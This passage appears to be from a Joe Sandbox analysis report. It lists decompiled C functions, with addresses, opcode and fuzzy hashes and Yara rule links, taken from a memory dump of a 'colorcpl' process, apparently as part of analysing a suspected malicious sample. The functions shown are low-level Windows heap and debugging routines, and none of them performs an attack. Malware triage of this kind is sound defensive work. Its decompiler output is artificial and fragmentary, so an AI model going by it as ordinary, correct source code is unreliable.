                                                                                                • Opcode ID: c5c056b10eec24f9921fef6ea44a60071401302ef0a22b1515e1403b4ab779de
                                                                                                • Instruction ID: 2bc6fc5521b934924c50ec36131cf64707c7b549ccb20d3e87a0c1abffc1247b
                                                                                                • Opcode Fuzzy Hash: c5c056b10eec24f9921fef6ea44a60071401302ef0a22b1515e1403b4ab779de
                                                                                                • Instruction Fuzzy Hash: 41F04F71E14358EFDB44DFA8D845AAEB7B8AF08300F444059A915EB281E6349900CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3C577 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E3C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E06E3C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x6df11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E06EE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                                0x06e3c577
                                                                                                0x06e3c57d
                                                                                                0x06e3c581
                                                                                                0x06e3c5b5
                                                                                                0x06e3c5b9
                                                                                                0x06e3c5ce
                                                                                                0x06e3c5ce
                                                                                                0x06e3c5ca
                                                                                                0x00000000
                                                                                                0x06e3c5ca
                                                                                                0x06e3c5c4
                                                                                                0x06e3c5c8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3c5ad
                                                                                                0x00000000
                                                                                                0x06e3c5af

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9cc328c5a6f4c0dd1b6618c150c541ee6c187f6c3b38763bd7740bb3cc879460
                                                                                                • Instruction ID: 6948ee62ab0a5890d54e2ef0395cdeb3b8ef3297599b2273136b2bf4965e3906
                                                                                                • Opcode Fuzzy Hash: 9cc328c5a6f4c0dd1b6618c150c541ee6c187f6c3b38763bd7740bb3cc879460
                                                                                                • Instruction Fuzzy Hash: 5CF0F0B2C253B0BED7F1AB14C40CB627BD89B04F38F64A467D615A3240C2A0C880C340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8D34 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 43%
                                                                                                			E06EE8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x6f0d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E06E37D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                                0x06ee8d34
                                                                                                0x06ee8d43
                                                                                                0x06ee8d4b
                                                                                                0x06ee8d4e
                                                                                                0x06ee8d52
                                                                                                0x06ee8d5c
                                                                                                0x06ee8d6e
                                                                                                0x06ee8d5e
                                                                                                0x06ee8d67
                                                                                                0x06ee8d67
                                                                                                0x06ee8d79
                                                                                                0x06ee8d7a
                                                                                                0x06ee8d7c
                                                                                                0x06ee8d81
                                                                                                0x06ee8d94

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 152b0d2ed7fd121edf25b11a81ddbb54e79e20c96ad2c2defeb21731ef610bfd
                                                                                                • Instruction ID: b913928bbac6396f4d1872dcfd16b6b53e7b466e5b7fa0c31b599a205ec937bd
                                                                                                • Opcode Fuzzy Hash: 152b0d2ed7fd121edf25b11a81ddbb54e79e20c96ad2c2defeb21731ef610bfd
                                                                                                • Instruction Fuzzy Hash: C6F0B470E0470C9FDB44EFB8D845AAE77B8EF08300F508099E915EB291DA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E5927A Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E06E5927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E06E5FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E06E592C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                                0x06e59295
                                                                                                0x06e59299
                                                                                                0x06e5929f
                                                                                                0x06e592aa
                                                                                                0x06e592ad
                                                                                                0x06e592ae
                                                                                                0x06e592af
                                                                                                0x06e592b0
                                                                                                0x06e592b4
                                                                                                0x06e592bb
                                                                                                0x06e592bb
                                                                                                0x06e592c5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction ID: bff29887534104646487f3a26e40e6692a394329dbdc30ef4316340208c1abc9
                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction Fuzzy Hash: D9E0E5322406406BD7919E05DC84B43369D9F82720F014078B9041F283C6E5D80887A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED2073 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E06ED2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E06ECFD22(__ecx);
				_t19 =  *0x6f0849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x6f08748; // 0x0
					if(__eflags <= 0) {
						E06ED1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x6f08724 & 0x00000004;
							if(( *0x6f08724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x6f08724; // 0x0
					return E06EC8DF1(__ebx, 0xc0000374, 0x6f05890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                                0x06ed2076
                                                                                                0x06ed2078
                                                                                                0x06ed207d
                                                                                                0x06ed2083
                                                                                                0x06ed20a4
                                                                                                0x06ed20aa
                                                                                                0x06ed20ac
                                                                                                0x06ed20b7
                                                                                                0x06ed20ba
                                                                                                0x06ed20bc
                                                                                                0x06ed20c9
                                                                                                0x06ed20c9
                                                                                                0x06ed20d0
                                                                                                0x06ed20d2
                                                                                                0x00000000
                                                                                                0x06ed20d2
                                                                                                0x06ed20be
                                                                                                0x06ed20c3
                                                                                                0x06ed20c5
                                                                                                0x06ed20c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed20c7
                                                                                                0x06ed20bc
                                                                                                0x06ed20d4
                                                                                                0x06ed2085
                                                                                                0x06ed2085
                                                                                                0x06ed20a3
                                                                                                0x06ed20a3

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cca0c51dc442e7e6c4441e19854c05e92dc687388eb7d32e59ae0f9d3701148b
                                                                                                • Instruction ID: f886cc859f8dab1cbf6c4ee094c2ab40120180ff38c2ae8358e9636f3603b620
                                                                                                • Opcode Fuzzy Hash: cca0c51dc442e7e6c4441e19854c05e92dc687388eb7d32e59ae0f9d3701148b
                                                                                                • Instruction Fuzzy Hash: 58F0272A9253884FEEF25B2426213D13F89E7451D8B093445DBB017204D5348A87CF15
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E14F2E Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E14F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E06EE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E06E3C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x6df1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                                0x06e14f2e
                                                                                                0x06e14f34
                                                                                                0x06e14f38
                                                                                                0x06e70b85
                                                                                                0x06e70b85
                                                                                                0x06e70b89
                                                                                                0x06e70b9a
                                                                                                0x06e70b9a
                                                                                                0x06e70b9f
                                                                                                0x00000000
                                                                                                0x06e70b9f
                                                                                                0x06e70b94
                                                                                                0x06e70b98
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e70b98
                                                                                                0x06e14f3e
                                                                                                0x06e14f48
                                                                                                0x00000000
                                                                                                0x06e14f6e
                                                                                                0x00000000
                                                                                                0x06e14f70

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f6d1cf2e0ebb168c0795a94c6a5b0395ea3fe91bdc94d2cbbbabf1223b8d9f5
                                                                                                • Instruction ID: e93b86ae597a6a5ea2dfb7d9bfba2870e93cb7713eb43c1518cf5201c1e74f7c
                                                                                                • Opcode Fuzzy Hash: 0f6d1cf2e0ebb168c0795a94c6a5b0395ea3fe91bdc94d2cbbbabf1223b8d9f5
                                                                                                • Instruction Fuzzy Hash: BFF0BEB2931794DFD7F0D718C584B22B7D8AB0477CF557465D41587A64C724FE80C680
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8CD6 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 36%
                                                                                                			E06EE8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x6f0d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E06E37D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                0x06ee8ce5
                                                                                                0x06ee8ced
                                                                                                0x06ee8cf0
                                                                                                0x06ee8cfb
                                                                                                0x06ee8d0d
                                                                                                0x06ee8cfd
                                                                                                0x06ee8d06
                                                                                                0x06ee8d06
                                                                                                0x06ee8d18
                                                                                                0x06ee8d19
                                                                                                0x06ee8d1b
                                                                                                0x06ee8d20
                                                                                                0x06ee8d33

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c7cb875e97f0eed149bbe48719c7d6765e76bec582f79c3150c7d5855db98fb0
                                                                                                • Instruction ID: 87e5f1ef2328e0f681c1a0cc47f60f08e063df6458f1dea6d580d2b38c9420f0
                                                                                                • Opcode Fuzzy Hash: c7cb875e97f0eed149bbe48719c7d6765e76bec582f79c3150c7d5855db98fb0
                                                                                                • Instruction Fuzzy Hash: 70F08270A0434CAFDB44DBB8E946EAE77B8EF09200F50119AE915EB281EA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3746D Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E06E3746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E06E2EB70(__ecx, 0x6f079a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E06E595D0();
							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                                0x06e3746d
                                                                                                0x06e3746d
                                                                                                0x06e3746d
                                                                                                0x06e37471
                                                                                                0x06e37488
                                                                                                0x06e7f92d
                                                                                                0x06e3748e
                                                                                                0x06e37491
                                                                                                0x06e37495
                                                                                                0x06e7f937
                                                                                                0x06e7f93a
                                                                                                0x06e7f94e
                                                                                                0x06e7f953
                                                                                                0x06e7f956
                                                                                                0x06e7f956
                                                                                                0x06e37495
                                                                                                0x00000000
                                                                                                0x06e37488
                                                                                                0x06e37473
                                                                                                0x06e37478
                                                                                                0x06e3747d
                                                                                                0x06e37481
                                                                                                0x00000000
                                                                                                0x06e37481
                                                                                                0x06e3747d
                                                                                                0x06e3747a
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 516d1adbefd8310809960e2ea59bbf23816194c68c9be6d0cef3b97bb999caad
                                                                                                • Instruction ID: c10cb6f9cbf05bb5f278be7498547ba7d15a3fd8f59335a9e46eb93f40f2cf07
                                                                                                • Opcode Fuzzy Hash: 516d1adbefd8310809960e2ea59bbf23816194c68c9be6d0cef3b97bb999caad
                                                                                                • Instruction Fuzzy Hash: D4F0B4749103A4AEDFD19B68C844BB9BB61AF04214F042155D871A7150E726E802C7CD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE8B58 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 36%
                                                                                                			E06EE8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x6f0d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E06E37D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E06E5B640(E06E59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                                0x06ee8b67
                                                                                                0x06ee8b6f
                                                                                                0x06ee8b72
                                                                                                0x06ee8b7d
                                                                                                0x06ee8b8f
                                                                                                0x06ee8b7f
                                                                                                0x06ee8b88
                                                                                                0x06ee8b88
                                                                                                0x06ee8b9a
                                                                                                0x06ee8b9b
                                                                                                0x06ee8b9d
                                                                                                0x06ee8ba2
                                                                                                0x06ee8bb5

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7bf5763523742c580dd13fd4eec788aa848695d0cbd620678e99f2be3dac1f91
                                                                                                • Instruction ID: 565790a830400de547f4a919793de74f0843a68db8b3576a3a99a0b51bf488c9
                                                                                                • Opcode Fuzzy Hash: 7bf5763523742c580dd13fd4eec788aa848695d0cbd620678e99f2be3dac1f91
                                                                                                • Instruction Fuzzy Hash: 34F05EB0A14358ABEB84EBA8D906A6E73B8AF04200F441459EA159B281EA74D900C798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4A44B Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x6f07b9c; // 0x0
				_t15 = __ecx;
				_t16 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E06E5FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                                0x06e4a44b
                                                                                                0x06e4a453
                                                                                                0x06e4a472
                                                                                                0x06e4a476
                                                                                                0x00000000
                                                                                                0x06e4a493
                                                                                                0x06e4a47a
                                                                                                0x06e4a47f
                                                                                                0x06e4a486
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1724768c696e4303f4f310be7e3d524644834df5c4b28ae46fe9c3676c781d46
                                                                                                • Instruction ID: b3f3dd67beaac5aa03b0d68e218ce6c5209588866990be3d491fe247a009a72c
                                                                                                • Opcode Fuzzy Hash: 1724768c696e4303f4f310be7e3d524644834df5c4b28ae46fe9c3676c781d46
                                                                                                • Instruction Fuzzy Hash: 3BE09272A41521ABE3A16E28BC00FAA739DEBD4651F0A5035E904C7254DA28DD02C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E1F358 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E06E1F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E06E4F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L06E34620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                                0x06e1f35d
                                                                                                0x06e1f361
                                                                                                0x06e1f367
                                                                                                0x06e1f372
                                                                                                0x06e1f38c
                                                                                                0x06e1f38c
                                                                                                0x06e1f394

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction ID: e1e0f62b4135864d7878f2b25a558af9020444dcbadad0398f750893759b3106
                                                                                                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                                • Instruction Fuzzy Hash: C1E0D832A40218FBCBA1AAD99D09F5ABBECDB44A60F001295B904DB150D5709D40D2D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2FF60 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E2FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x6df11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E06EE88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E06E30050(_t14);
				}
			}










                                                                                                0x06e2ff66
                                                                                                0x06e2ff6b
                                                                                                0x00000000
                                                                                                0x06e2ff8f
                                                                                                0x00000000
                                                                                                0x06e2ff8f

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f30ac1389c3680f814742f83ff549b17fe5c6e7c48b3969713f5c885e7f029cd
                                                                                                • Instruction ID: 66a8837acf9d0a8c0bf3ab55045e00fd8d1242effc4367d7d5e17d5e5af2466a
                                                                                                • Opcode Fuzzy Hash: f30ac1389c3680f814742f83ff549b17fe5c6e7c48b3969713f5c885e7f029cd
                                                                                                • Instruction Fuzzy Hash: 8EE0DFB0A59315DFF7B4DB51D560F2737BFBB52629F2AA41EE8084B101C621D880C64A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ECD380 Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06ECD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L06E1E8B0(__ecx, _a4, 0xfff);
					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                                0x06ecd38a
                                                                                                0x06ecd39b
                                                                                                0x06ecd3b1
                                                                                                0x00000000
                                                                                                0x06ecd3b6
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction ID: c4c9848ec0a5e0d28c3a1b5c0d3664a8ab8f6807fa6ae2ffa5a3cc970d873ab9
                                                                                                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                                • Instruction Fuzzy Hash: D9E0C231280318BBEB625E48CD04FA9BB1AEF407A1F104035FE085E690C6729C92E6C4
                                                                                                Uniqueness

